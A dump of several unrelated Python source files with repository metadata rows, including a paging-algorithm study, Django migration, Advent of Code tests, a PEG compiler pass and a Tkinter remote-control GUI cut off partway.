## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
## $QT_END_LICENSE$
##
###########################################################################
from PyQt5.QtWidgets import QApplication, QLabel, QMainWindow, QMessageBox
import stylesheet_rc
from ui_mainwindow import Ui_MainWindow
from stylesheeteditor import StyleSheetEditor
class MainWindow(QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.ui.nameLabel.setProperty('class', 'mandatory QLabel')
self.styleSheetEditor = StyleSheetEditor(self)
self.statusBar().addWidget(QLabel("Ready"))
self.ui.exitAction.triggered.connect(QApplication.instance().quit)
self.ui.aboutQtAction.triggered.connect(QApplication.instance().aboutQt)
def on_editStyleAction_triggered(self):
self.styleSheetEditor.show()
self.styleSheetEditor.activateWindow()
def on_aboutAction_triggered(self):
QMessageBox.about(self, "About Style sheet",
"The <b>Style Sheet</b> example shows how widgets can be "
"styled using "
"<a href=\"http://doc.qt.digia.com/4.5/stylesheet.html\">Qt "
"Style Sheets</a>. Click <b>File|Edit Style Sheet</b> to pop "
"up the style editor, and either choose an existing style "
"sheet or design your own.")
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(app.exec_())
| [
"dukalow@gmail.com"
] | dukalow@gmail.com |
9d8c06c7fd4bbe26b5861b1a1fcc6fc581759472 | bc1037d35cddecbfaa1b3fb0549a9721aba7a815 | /Problems/5.30/Solution-1/paging.py | 74134883c38e3be319009d64ed49982257cd14e4 | [] | no_license | crhntr/IAA-Code | 0d6a322d64857f7a17cb1faf72c0c9bb7e41f936 | 32d725eeed3012a1644ca30ee2899b7bfe8d5b09 | refs/heads/master | 2021-05-11T00:20:36.065974 | 2018-01-22T01:40:02 | 2018-01-22T01:40:02 | 118,299,269 | 1 | 0 | null | 2018-01-21T02:53:21 | 2018-01-21T02:53:20 | null | UTF-8 | Python | false | false | 11,444 | py | # Introduction to the Analysis of Algorithms (3rd ed)
# Michael Soltys
## Problem 5.30 - Paging
## Ryan McIntyre
## 6/22/2017
## python 3.5.2
from collections import Counter as counter
"""
Online*:
LRU = "Least Recently Used", self explanatory
FIFO = "First In / First Out", self explanatory
LIFO = "Last In / First Out", self explanatory but stupid in most situations
LFU = "Least Frequently Used", self explanatory. Use LRU as "backup" sort?
CLOCK = go to wikipedia, but short version:
cache is circular linked list, with auxillary circular reference list.
reference list is set to '1' at position of pointer when a new page is
inserted into cache. In order to evict, look at pointer. if referenced
list at pointer is 1, change to 0 and move to next item to repeat. If
referenced is 0, evict and add new page (set reference to 0) and move
pointer.
Basically "LRU" but each inserted page has an "extra life" before it
gets evictet. Small cost for (usually) larger gain over LRU, worst
case is LRU + "extra check" for each eviction.
Offline:
LFD = "Longest Forward Distance", self explanatory, equivalent to OPT
"""
#------------------------------------------------------------------------------
#------------------------------------------------------------------linked_lists
#------------------------------------------------------------------------------
class ll_item():
def __init__(self,tag=0):
self.tag = tag
self.prev = None
self.next = None
def set_next(self,n):
self.next = n
def set_prev(self,n):
self.prev = n
def get_next(self):
return self.next
def get_prev(self):
return self.prev
def set_tag(self,tag):
self.tag = tag
def get_tag(self):
return self.tag
class ll():
def __init__(self,cache_size):
self.head = ll_item('head')
body = [ll_item() for i in range(cache_size)]
self.head.set_next(body[0])
body[0].set_prev(self.head)
for i in range(1,len(body)):
body[i-1].set_next(body[i])
body[i].set_prev(body[i-1])
self.current = self.head.get_next()
def get_cur(self):
return self.current.get_tag()
def set_cur(self,tag):
self.current.set_tag(tag)
def get_head(self):
return self.head
def turn(self):
self.current = self.current.get_next()
def get_next(self):
return self.current.get_next()
def detach(self):
self.current.get_prev().set_next(self.current.get_next())
if self.current.get_next():
self.current.get_next().set_prev(self.current.get_prev())
self.turn()
def prepend(self,tag):
new = ll_item(tag)
h = self.head.get_next()
self.head.set_next(new)
new.set_prev(self.head)
h.set_prev(new)
new.set_next(h)
self.current = new
def mtf(self):
c = self.current
self.detach()
h = self.head.get_next()
self.head.set_next(c)
c.set_prev(self.head)
c.set_next(h)
h.set_prev(c)
def reset(self):
self.current = self.head
#------------------------------------------------------------------------------
#---------------------------------------------------------------------------LRU
#------------------------------------------------------------------------------
class LRU():
def __init__(self,cache_size):
self.ll = ll(cache_size)
self.fault_count = 0
def process(self,request):
self.ll.reset()
done = False
while self.ll.get_next():
self.ll.turn()
tag = self.ll.get_cur()
if tag == request:
done = True
self.ll.mtf()
break
elif tag == 0:
self.fault_count += 1
self.ll.set_cur(request)
self.ll.mtf()
done = True
break
if not done:
self.ll.set_cur(request)
self.ll.mtf()
self.fault_count += 1
def reset_cache_size(self,n):
self.__init__(n)
#------------------------------------------------------------------------------
#--------------------------------------------------------------------------FIFO
#------------------------------------------------------------------------------
class FIFO():
def __init__(self,cache_size):
self.ll = ll(cache_size)
self.fault_count = 0
def process(self,request):
self.ll.reset()
done = False
while self.ll.get_next():
self.ll.turn()
tag = self.ll.get_cur()
if tag == request:
done = True
break
elif tag == 0:
self.fault_count += 1
self.ll.set_cur(request)
self.ll.mtf()
done = True
break
if not done:
self.ll.set_cur(request)
self.ll.mtf()
self.fault_count += 1
def reset_cache_size(self,n):
self.__init__(n)
#------------------------------------------------------------------------------
#--------------------------------------------------------------------------LIFO
#------------------------------------------------------------------------------
class LIFO():
def __init__(self,cache_size):
self.ll = ll(cache_size)
self.fault_count = 0
def process(self,request):
self.ll.reset()
done = False
while self.ll.get_next():
self.ll.turn()
tag = self.ll.get_cur()
if tag == request:
done = True
break
elif tag == 0:
self.fault_count += 1
self.ll.set_cur(request)
done = True
break
if not done:
self.ll.set_cur(request)
self.ll.mtf()
self.fault_count += 1
def reset_cache_size(self,n):
self.__init__(n)
#------------------------------------------------------------------------------
#---------------------------------------------------------------------------LFU
#------------------------------------------------------------------------------
class LFU():
def __init__(self,cache_size):
self.count = counter()
self.fault_count = 0
self.size = cache_size
def process(self,request):
if request in self.count:
self.count[request] += 1
elif len(self.count) < self.size:
self.fault_count += 1
self.count[request] += 1
else:
lfu = min(self.count, key = lambda x : self.count[x])
del self.count[lfu]
self.count[request] += 1
self.fault_count += 1
def reset_cache_size(self,n):
self.__init__(n)
#------------------------------------------------------------------------------
#-------------------------------------------------------------------------CLOCK
#------------------------------------------------------------------------------
#CLOCK requires a circular linked list
class cll():
def __init__(self,cache_size):
items = [ll_item() for i in range(cache_size)]
for i in range(cache_size-1):
items[i].set_next(items[i+1])
items[i+1].set_prev(items[i])
items[0].set_prev(items[-1])
items[-1].set_next(items[0])
self.current = items[0]
def get_cur(self):
return self.current.get_tag()
def get_cur_node(self):
return self.current
def set_cur(self,tag):
self.current.set_tag(tag)
def turn(self):
self.current = self.current.get_next()
def get_next(self):
return self.current.get_next()
class CLOCK():
def __init__(self,cache_size):
self.clock = cll(cache_size)
self.referenced = cll(cache_size)
self.size = cache_size
self.fault_count = 0
def turn(self):
self.clock.turn()
self.referenced.turn()
def process(self,request):
done = False
cur = self.clock.get_cur_node()
r = self.referenced.get_cur_node()
i = 0
passed = []
while i < self.size:
if cur.get_tag() == request:
r.set_tag(1)
done = True
for re in passed:
re.set_tag(0)
break
elif cur.get_tag() == 0:
self.fault_count += 1
r.set_tag(0)
cur.set_tag(request)
done = True
break
passed.append(r)
r = r.get_next()
cur = cur.get_next()
i += 1
if not done:
self.fault_count += 1
while True:
if self.referenced.get_cur == 1:
self.referenced.set_cur(0)
self.turn()
else:
self.clock.set_cur(request)
self.referenced.set_cur(0)
self.turn()
break
def reset_lists(self):
i = 0
while i < self.size:
self.clock.set_cur(0)
self.referenced.set_cur(0)
self.turn()
i += 1
def reset_score(self):
self.score = 0
def full_reset(self):
self.reset_lists()
self.reset_score()
def reset_cache_size(self,n):
self.__init__(n)
#------------------------------------------------------------------------------
#---------------------------------------------------------------------LFD / OPT
#------------------------------------------------------------------------------
class LFD:
def __init__(self,cache_size):
self.distance = dict()
self.size = cache_size
self.fault_count = 0
def process(self,request_list):
i = 0
while i < len(request_list):
r = request_list[i]
if r in self.distance:
if r in request_list[i+1:]:
self.distance[r] += request_list[i+1:].index(r)+1
else:
self.distance[r] = float('inf')
elif len(self.distance) < self.size:
self.fault_count += 1
if r in request_list[i+1:]:
self.distance[r] = i+1+request_list[i+1:].index(r)
else:
self.distance[r] = float('inf')
else:
self.fault_count += 1
d = max(self.distance, key = lambda x : self.distance[x])
del self.distance[d]
if r in request_list[i+1:]:
self.distance[r] = i+1+request_list[i+1:].index(r)
else:
self.distance[r] = float('inf')
i += 1
def reset_cache_size(self,n):
self.__init__(n) | [
"arewhyaeenn@gmail.com"
] | arewhyaeenn@gmail.com |
0ad13de9417ee4a25adef859f6294905a1ef218a | e6042030b195a88a949cd5763244cc76ac1214cc | /users/migrations/0002_profile_info.py | f5e280bec29f5e3ce2c436a8ef5a3059504b0aee | [] | no_license | 3liud/Bidding_store | a5eaa2a92b98e0ff5b04cdc9a39ab3c6c1ed9222 | 315073a31919f7f60174361455594a8def9197f1 | refs/heads/master | 2020-04-14T09:28:25.798386 | 2019-04-29T07:25:58 | 2019-04-29T07:25:58 | 163,760,916 | 0 | 1 | null | 2019-03-20T08:32:12 | 2019-01-01T19:24:23 | Python | UTF-8 | Python | false | false | 840 | py | # Generated by Django 2.1.7 on 2019-03-29 09:17
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('users', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Profile_info',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('account', models.IntegerField(max_length=20)),
('address', models.CharField(default='0', max_length=500)),
('name', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"eliud@localhost.localdomain"
] | eliud@localhost.localdomain |
1f77afe28d0cb282cba9d56049db486e0e6d1c6f | d39bf3e0141f39752b40ca420ec7d90204ad4219 | /tests/test_day_02.py | 213be9a1bfceacdaa6696775d1b77d416bee4eb0 | [] | no_license | jasonbrackman/advent_of_code_2017 | 33260d98e1c348b8d249eabe425783568c3db494 | a50e0cf9b628da96cb365744027d1a800557d1c9 | refs/heads/master | 2022-02-18T18:06:58.119383 | 2019-09-12T05:00:02 | 2019-09-12T05:00:02 | 112,784,403 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 957 | py | """
5 1 9 5
7 5 3
2 4 6 8
The first row's largest and smallest values are 9 and 1, and their difference is 8.
The second row's largest and smallest values are 7 and 3, and their difference is 4.
The third row's difference is 6.
In this example, the spreadsheet's checksum would be 8 + 4 + 6 = 18.
What is the checksum for the spreadsheet in your puzzle input?
"""
import pytest
from .. import day_02
@pytest.mark.parametrize('param, expect', [('5 1 9 5', 8),
('7 5 3', 4),
('2 4 6 8', 6)])
def test_min_max_diff(param, expect):
assert day_02.min_max_dif(param) == expect
@pytest.mark.parametrize('param, expect', [('5 9 2 8', 4),
('9 4 7 3', 3),
('3 8 6 5', 2)])
def test_get_divisible_result(param, expect):
assert day_02.get_divisible_result(param) == expect | [
"brackman@gmail.com"
] | brackman@gmail.com |
3a4429b465e6d717885a3200420bd2b15a6199a6 | 9e812c3b6c0bc33cf53da5400436bb340f5beaaf | /Flask_API_v2/With authorization/users.py | 44d869bf497fe457a727d077a73d1dec7e6428f1 | [] | no_license | VladZg/Flask_project | e0230e88efdff3c298e29a4053a29ea9b9d457c4 | cf701b1d55a8f6572ce2fb3fcbf46451ec8ee59b | refs/heads/master | 2023-05-14T12:43:11.648280 | 2021-05-27T13:03:07 | 2021-05-27T13:03:07 | 355,556,742 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | class User(object):
def __init__(self, _id, username, password):
self.id = _id
self.username = username
self.password = password
def __str__(self):
return f"User(id='{self.id}')"
users = [
User(1, 'user1', 'abcxyz'),
User(2, 'user2', 'abcxyz'),
]
username_table = {u.username: u for u in users}
userid_table = {u.id: u for u in users}
| [
"2022zagorodniuk.vv@student.letovo.ru"
] | 2022zagorodniuk.vv@student.letovo.ru |
0b89a9634b9964f9c3b76b14b80b71e32f0ee040 | 0399c5038d53422867b713c80f0b4e06a379ea49 | /v3_horst_resort.py | 98684edd4a5b18bf70e11256827464da2494f9b0 | [] | no_license | pleabargain/python_basic_pizza | e44157eaf64ec2cda8daa9f054eb4187eae5075d | 180a407887aadc9c1b9bb0047551cd39aa573801 | refs/heads/main | 2023-02-10T01:30:58.921666 | 2021-01-03T17:51:53 | 2021-01-03T17:51:53 | 326,415,472 | 0 | 1 | null | 2021-01-03T16:30:54 | 2021-01-03T13:38:12 | Python | UTF-8 | Python | false | false | 1,703 | py | #fancy pizza order
#pizza order
#--- basis price ---
#small pizza = 12
#medium pizza = 15
#medium pizza = 20
# ---price for pepperoni depending on pizza size ---
#pepperoni small = 3
#pepperoni medium = 5
#pepperoni large = 8
# --- price for cheese depending on pizza size ----
#extra_cheese_small =3
#extra_cheese_med =5
#extra_cheese_med =8
from collections import namedtuple
Price = namedtuple("Price", ["standard", "luxury", "VIP"])
#what is the underscore for?
size_list = Price._fields # the underscore is IMPORTANT
basis = Price(1200,1500,2000)
extra_bed = Price(30,50,90)
one_child = Price(40,50,80)
bottle_wine =Price(10,22,33)
spa =Price(150,270,350)
# ask for pizza size
def accept_answer(question, list_of_possible_answers):
"""takes user input and renders it lower case for processing
"""
while True:
answer = input(question + " >>>")
if answer.lower() in [a.lower() for a in list_of_possible_answers]:
return answer.lower()
print("pizza sizes and prices:")
for size in size_list:
print(size, "cost", getattr(basis, size))
size = accept_answer("How big do you want your resort? Type\nstandard\nluxury\nVIP\n", size_list )
cost = getattr(basis, size)
for extra in ("extra_bed","one_child", "bottle_wine","spa"):
#what does locals do?
#what is the notation for[extra]?
#how do I use getattr?
price_for_extra = getattr(locals()[extra], size) # use globals() if inside a class/function
print(extra, " will cost:", price_for_extra)
if accept_answer(f"Do you want {extra}? (yes or no)", ["yes", "no"]) == "yes":
cost += price_for_extra
print("Your total cost is:", cost)
| [
"dennisgdaniels@gmail.com"
] | dennisgdaniels@gmail.com |
62e83d014e06a2aa532f768797c878fd7954ba66 | 6374af29ae984d96f86297f6e51dba40d889ab46 | /src/peggypy/compiler/report_infinite_recursion.py | d51ac3fb55d1a356cb1c8cc0ac1ddbededbc6929 | [] | no_license | thehappycheese/peggypy | 0d2ce02f1de6dfdde6a4cc208886d32531cbe9a3 | e2991f43a3e200e1154b85dfa0740b8ce4168a8c | refs/heads/main | 2023-09-03T03:23:05.292398 | 2021-10-17T16:14:20 | 2021-10-17T16:14:20 | 412,138,715 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,364 | py |
from typing import Any
from peggypy.compiler.always_consumes_on_success import always_consumes_on_success
from ..grammar_error import Diagnostic, GrammarError
from .utils_and_types.visitor import Visitor
from .utils_and_types.syntax_tree import (
Grammar,
Rule,
Rule_Ref,
Sequence
)
def rule(self:Visitor, node:Rule, options:dict[str, Any]):
options["visited_rules"].append(node.name)
self.visit(node.expression, options)
options["visited_rules"].pop()
def sequence(self:Visitor, node:Sequence, options:dict[str, Any]):
# TODO: Array.every result is unused in original code??? Array.every appears to be used as a way to stop iteration on the first false result
for element in node.elements:
self.visit(element, options)
if not always_consumes_on_success(options["grammar"], element, options):
break
def rule_ref(self:Visitor, node:Rule_Ref, options:dict[str, Any]):
options["backtrace_refs"].push(node)
rule = options["grammar"].findRule(node.name)
if node.name in options["visited_rules"]:
self.visit(rule, options)
options["backtrace_refs"].pop()
else:
options["visited_rules"].push(node.name)
diagnostics:list[Diagnostic] = []
for index, ref in enumerate(options["backtrace_refs"]):
if index + 1 != len(options["backtrace_refs"]):
message = f'Step {index + 1}: call of the rule "{ref.name}" without input consumption'
else:
message = f"Step {index + 1}: call itself without input consumption - left recursion"
diagnostics.append(Diagnostic(message, ref.location))
raise GrammarError(
f"Possible infinite loop when parsing (left recursion: {options['visited_rules'].join(' -> ')} )",
rule.nameLocation,
diagnostics
)
report_infinite_recusrsion_visitor = Visitor({
"rule" : rule,
"sequence" : sequence,
"rule_ref" : rule_ref
})
def report_infinite_recusrsion(grammar:Grammar, options:dict[str, Any]):
"""
Reports left recursion in the grammar, which prevents infinite recursion in
the generated parser.
Both direct and indirect recursion is detected. The pass also correctly
reports cases like this:
start = "a"? start
In general, if a rule reference can be reached without consuming any input,
it can lead to left recursion.
"""
report_infinite_recusrsion_visitor.visit(grammar, {
**options,
"grammar":grammar,
"visited_rules":[],
"backtrace_refs": []
})
| [
"the.nicholas.archer@gmail.com"
] | the.nicholas.archer@gmail.com |
20dc246337514a94a05d62f9a2151d156f2d4100 | 6dd9e0a01411107799d7d54cfdf0177391c68040 | /python/code_hints_tips/strip_method.py | 2fb1323f9eaff89666fc450594647efd61428e58 | [] | no_license | davidm3591/Code-Cheats-Settings | ce792b2dd2293b16262941966eca564c9c3be9bc | d2ccc9aea174ea3302f84d444b082d261c799b11 | refs/heads/master | 2023-02-24T12:28:57.420551 | 2023-02-20T06:30:18 | 2023-02-20T06:30:18 | 203,030,723 | 0 | 0 | null | 2023-02-20T06:30:20 | 2019-08-18T16:37:15 | Python | UTF-8 | Python | false | false | 379 | py | # python strip method
import re
my_str = "0000000this is string example....wow!!!0000000";
pattern = re.compile(r'0')
# matches = pattern.finditer(my_str)
# matches = pattern.findall(my_str)
matches = pattern.match(my_str)
print(matches)
# print(matches.strip(0))
# count = 0
# for match in matches:
# count += 1
# print(f"{count}: {match}")
print(my_str.strip('0'))
| [
"davidmltz@gmail.com"
] | davidmltz@gmail.com |
00998e3732eae7254bdc0de2feb20ec46c840040 | e04798648c899f4fcf66053b02fe60ce698dc51c | /devel/remote_pilot_control_gui_advanced.stable.py | c29b3a37d9784b8312e889cfd86406b7a2a31935 | [] | no_license | krauspe/rpctl | c2d6dae0a0c3f052f869f6c2c047234aef20ceb4 | 6c177727df85d6dd5c0fc4d1cfbdb7b85ff2d07b | refs/heads/master | 2021-01-21T04:47:05.301167 | 2018-08-21T11:08:27 | 2018-08-21T11:08:27 | 46,799,800 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,594 | py | #!/usr/bin/env python
#TODO: solve basedir path problem
#TODO: file not found error handling for status_list and target_config list
#DONE: disable "start reconfiguration" button after it has been pressed
#DONE: change default entry in remote fqdn select boxes to "no_change" after end of reconfiguration
#TODO: chosse solution for long lists of resource psps as workaround until creation off different "views" see below..
#DONE -> Using scrolled labels: problem: when header in canvas frame: header scrolls too. header in own frame: it isn'reg_window alligned !
#TODO: create views (resource, remote, status...): possible solutins: tabs, windows, ..
#TODO: improve simulation: admin_get_status_list.sh should create a simulated status with random errors
#TODO: admin_reconfigure_nscs.sh should use the above get status script
from Tkinter import *
from tkFileDialog import askopenfilename,askopenfile
import tkFont
import ScrolledText
import subprocess as sub
import os
import pprint
from MyPILTools import LabelAnimated
# settings
main_window_title = """ 2Step Remote Pilot Control 1.5 (unregistered) """
#main_window_title = """ 2Step Remote Pilot Control Mega Advanced (unregistered) """
about = """
2Step Remote Pilot Control 1.5 (c) Peter Krauspe DFS 11/2015
The expert tool for
Remote Piloting
"""
#mode = "simulate"
mode = "productive"
mode_comment = "as configured"
#basedir = ".."
basedir_abs = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
basedir = os.path.relpath(basedir_abs)
print "basedir = ", basedir
#ext_basedir = os.path.join(basedir, "..", "tsctl2")
ext_basedir = os.path.join(os.path.dirname(basedir_abs),"tsctl2")
#ext_basedir = os.path.join(os.path.dirname(basedir_abs),"tsctl2")
#ext_basedir = os.path.relpath(ext_basedir_abs)
# TODO: get relative path
print "ext_basedir = ", ext_basedir
if not os.path.exists(ext_basedir):
mode = "simulate"
mode_comment = "because %s doesn'reg_window exist !\n" % ext_basedir
imagedir = os.path.join(basedir, "images")
animdir = os.path.join(imagedir, "animated_gifs")
int_bindir = os.path.join(basedir,"scripts")
int_confdir = os.path.join(basedir,"config")
int_vardir = os.path.join(basedir, "var")
ext_bindir = os.path.join(ext_basedir,"bin")
ext_confdir = os.path.join(ext_basedir,"config")
ext_vardir = os.path.join(ext_basedir, "var")
sim_bindir = os.path.join(basedir,"binsim")
cfg = {
"productive":
{"bindir":ext_bindir,
"confdir":ext_confdir,
"vardir":ext_vardir,
"descr": "Production Mode"},
"internal":
{"bindir":int_bindir,
"confdir":int_confdir,
"vardir":int_vardir,
"descr": "Using internal scripts and lists"},
"internal_bin":
{"bindir":int_bindir,
"confdir":ext_confdir,
"vardir":ext_vardir,
"descr": "Using internal scripts and productive lists"},
"simulate":
{"bindir":sim_bindir,
"confdir":int_confdir,
"vardir":int_vardir,
"descr": "Creating and using simulated internal lists"},
}
mode_comment = cfg[mode]["descr"] + '\n' + mode_comment
bindir = cfg[mode]["bindir"]
confdir = cfg[mode]["confdir"]
vardir = cfg[mode]["vardir"]
for dir in [bindir,confdir,vardir]:
print dir
resource_nsc_list_file = os.path.join(vardir,"resource_nsc.list")
target_config_list_file = os.path.join(vardir,"target_config.list")
remote_nsc_list_file = os.path.join(vardir,"remote_nsc.list")
nsc_status_list_file = os.path.join(vardir,"nsc_status.list")
# decoration
logo_filename = 'dfs.gif'
animated_gif_filename = 'airplane13.gif'
# default NOT in animated_gif dir because this can change ...
logo_file = os.path.join(imagedir, logo_filename)
animated_gif_file = os.path.join(imagedir, animated_gif_filename)
duration = 1
#run_shell_opt = "fake"
run_shell_opt = ""
# external commands -> moved into Main class
# todo: einlesen und auswerten
#source ${confdir}/remote_nsc.cfg # providing: subtype, ResourceDomainServers, RemoteDomainServers
# app settings
subtype = "psp"
def newFile():
name = askopenfilename()
print "open: ", name
def About():
print about
def getFileAsList(file):
#return [tuple(line.rstrip('\n').split()) for line in open(file) if not line.startswith('#')]
return [line.rstrip('\n').split() for line in open(file) if not line.startswith('#')]
def getFileAsListOfRow(file, row):
return [line.rstrip('\n').split()[row] for line in open(file) if not line.startswith('#')]
def getTargetConfigList(file):
'''https://docs.python.org/2/library/itertools.html
itertools.izip_longest(*iterables[, fillvalue])
Make an iterator that aggregates elements from each of the iterables.
If the iterables are of uneven length, missing values are filled-in with fillvalue.
Iteration continues until the longest iterable is exhausted. Equivalent to
TODO:
Einlesen von tuples ungleicher laenge mit itertools'''
pass
def saveListAsFile(list,filepath):
print "\nSaving %s\n" % filepath
f = open(filepath, 'w')
for tup in list:
line = ''
for element in tup:
line += ' ' + element
f.write(line + '\n')
f.close()
#print "type(line) = %s\n" % type(line)
def Quit():
print "Quit"
root.quit()
class redirectText(object):
"""http://stackoverflow.com/questions/24707308/get-command-window-output-to-display-in-widget-with-tkinter
http://stackoverflow.com/questions/30669015/autoscroll-of-text-and-scrollbar-in-python-text-box"""
def __init__(self, outtext):
"""Constructor"""
self.output = outtext
def write(self, string):
""""""
self.output.insert(END, string)
self.output.see("end")
class MainApp(Frame):
#def __init__(self, root, *args, **kwargs):
def __init__(self, root=None ):
"""http://stackoverflow.com/questions/6129899/python-multiple-frames-with-grid-manager"""
self.choosen = {}
self.var = {}
self.init_output = "\nConsole output initialized.\n\n" + mode_comment
self.r1 = 0
self.label_status_text_trans = {"available" : "READY", "occupied" : "READY", "unreachable" : "UNREACHABLE !", None: ""}
self.label_operation_mode_text_trans = {"available" : "LOCAL", "occupied" : "REMOTE", "unreachable" : "?", None: ""}
self.label_status_textcol = {"available" : "dark green", "occupied" : "dark green", "unreachable" : "red", None: "lightgrey"}
self.label_operation_mode_textcol = {"available" : "black", "occupied" : "blue", "unreachable" : "red", None: "lightgrey"}
#Frame.__init__(self, master=None,*args, **kwargs)
Frame.__init__(self, root)
# LOGO
self.frame = Frame(root, bg="lightblue")
#self.frame.grid(row=0,column=6)
self.frame.grid(row=0,column=1)
self.logo = PhotoImage(file=logo_file)
Label(self.frame, image=self.logo).grid(row=0,column=1)
# Label(self, fg="dark blue", bg="dark grey", font="Helvetica 13 bold italic", text=explanation).grid(row=0,column=1);
# self.slogan = Button(frame, text="MachDasEsGeht", command=self.writeSlogan).grid(row=0,column=2)
# CONSOLE
self.con_frame = Frame(root, bg="white")
self.con_frame.grid(row=1, column=0)
self.console = ScrolledText.ScrolledText(self.con_frame, bg="white")
self.console.grid(row=1, column=0)
#self.anim = None
self.anim = self.showAnimatedGif(animated_gif_file,duration,1,1)
# redirect stdout
self.stdoutOrig = sys.stdout
self.redir = redirectText(self.console)
sys.stdout = self.redir
#self.console.insert(END, self.output)
# print initial message
print self.init_output
# BUTTONS
n=0
self.con_and_button_frame = Frame(root, bg="lightgrey")
self.con_and_button_frame.grid(row=1, column=1, sticky=W+E+N+S)
Button(self.con_and_button_frame, text="Deploy Configs", command=self.deploy_configs).grid(row=1, column=1, sticky=W+E)
Button(self.con_and_button_frame, text="Update Resource PSP List", command=self.update_resource_nsc_list).grid(row=2, column=1, sticky=W+E)
Button(self.con_and_button_frame, text="Update Remote Pilot Status", command=self.updateStatus).grid(row=3, column=1, sticky=W+E)
Button(self.con_and_button_frame, text="Simulate External Command", command=self.simulateExternalCommand).grid(row=4, column=1, sticky=W+E)
#Label(self.con_and_button_frame, text="").grid(row=4, column=1, sticky=W+E)
Button(self.con_and_button_frame, text="Print Remote PSP list", command=self.printRemoteNscList).grid(row=5, column=1, sticky=W+E)
Button(self.con_and_button_frame, text="Print Status list", command=self.printNscStatusList).grid(row=6, column=1, sticky=W+E)
Button(self.con_and_button_frame, text="Print Resource PSP list", command=self.printResourceNscList).grid(row=7, column=1, sticky=W+E)
Label(self.con_and_button_frame, text="").grid(row=8, column=1, sticky=W+E)
Button(self.con_and_button_frame, text="Confirm Remote PSP Choices", command=self.confirmRemotePSPChoices).grid(row=9, column=1, sticky=W+E)
#Label(self.con_and_button_frame, text="").grid(row=10, column=1, sticky=W+E)
Button(self.con_and_button_frame, text="Stop Animation", command=self.stopAnimation).grid(row=10, column=1, sticky=W+E)
self.bt_Start_Reconfiguration = Button(self.con_and_button_frame, text="Start Reconfiguration", command=self.startReconfiguration, state=DISABLED, activebackground="red")
self.bt_Start_Reconfiguration.grid(row=11, column=1, sticky=W+E)
Label(self.con_and_button_frame, text="").grid(row=12, column=1, sticky=W+E)
Button(self.con_and_button_frame,text="QUIT", fg="red",command=self.frame.quit).grid(row=13,column=1, sticky=W+E)
# LIST HEADER
#################
self.canvas_frame = Frame(root, bg="grey")
self.canvas_frame.grid(row=4, column=0)
self.canvas = Canvas(self.canvas_frame, borderwidth=0, background="#ffffff")
self.list_frame = Frame(self.canvas, bg="grey")
self.list_frame.grid(row=4, column=0)
lhwidth = 17
lwidth = 21
# Label(self.list_frame, text="Resource %s " % subtype.upper(), font="-weight bold", width=lwidth, bg="lightblue", relief=GROOVE).grid(row=2, column=0)
# Label(self.list_frame, text="Current FQDN ", font="-weight bold", width=lwidth, bg="lightblue", relief=GROOVE).grid(row=2, column=1)
# Label(self.list_frame, text="Operation Mode", font="-weight bold", width=lwidth, bg="lightblue", relief=GROOVE).grid(row=2, column=2)
# Label(self.list_frame, text="Status", font="-weight bold", width=lwidth, bg="lightblue", relief=GROOVE).grid(row=2, column=3)
# Label(self.list_frame, text="Choose Remote FQDN ", width=23, bg="lightblue", relief=GROOVE).grid(row=2, column=4)
#self.lFont = tkFont.Font(family="Helvetica", size=10)
self.lhFont = tkFont.Font(family="Arial Black", size=11)
self.lFont = tkFont.Font(family="Arial", size=10)
self.optFont = tkFont.Font(family="Arial", size=9)
self.opthFont = tkFont.Font(family="Arial Black", size=9)
Label(self.list_frame, text="Resource %s " % subtype.upper(), font=self.lhFont, width=lhwidth, bg="lightblue", relief=GROOVE).grid(row=2, column=0)
Label(self.list_frame, text="Current FQDN ", font=self.lhFont, width=lhwidth, bg="lightblue", relief=GROOVE).grid(row=2, column=1)
Label(self.list_frame, text="Operation Mode", font=self.lhFont, width=lhwidth, bg="lightblue", relief=GROOVE).grid(row=2, column=2)
Label(self.list_frame, text="Status", font=self.lhFont, width=lhwidth, bg="lightblue", relief=GROOVE).grid(row=2, column=3)
Label(self.list_frame, text="Choose Remote FQDN ", font=self.opthFont, width=20, bg="lightyellow", relief=GROOVE).grid(row=2, column=4)
self.vsb = Scrollbar(self.canvas_frame, orient="vertical", command=self.canvas.yview)
self.canvas.configure(yscrollcommand=self.vsb.set)
self.canvas.create_window((0,0),window=self.list_frame, anchor="nw",tags="self.list_frame")
self.vsb.pack(side="right", fill="y")
self.canvas.pack(side="left",fill="both", expand=True)
self.buildMenu(root)
self.loadLists()
self.ResourceStatus = {} # define explicit dict for resource fqdn status
# LIST | OptionMenu
self.lt_resfqdns = {}
self.lt_curfqdns = {}
self.lt_Status = {}
self.lt_operation_mode = {}
self.lt_newfqdn = {}
self.label_resfqdn = {}
self.label_curfqdn = {}
self.label_status = {}
self.label_operation_mode = {}
self.om = {}
self.new_target_config_list = []
self.r1 = 3
#self.testoptions = ("aaa","bbb","ccc","ddd")
for resfqdn,curfqdn,status in self.nsc_status_list:
self.ResourceStatus[resfqdn] = status
# wenn sich die Anzahl der resfqdns erhoeht fehlen hierfuer labels, daher Neustart noetig !
# Loesung: weitere Lables fuer neue Eintrage erzeugen (nicht in init)
# define tkinter vars
self.lt_resfqdns[resfqdn] = StringVar()
self.lt_curfqdns[resfqdn] = StringVar()
self.lt_Status[resfqdn] = StringVar()
self.lt_operation_mode[resfqdn] = StringVar()
self.lt_newfqdn[resfqdn] = StringVar()
# set initial values
self.lt_resfqdns[resfqdn].set(resfqdn)
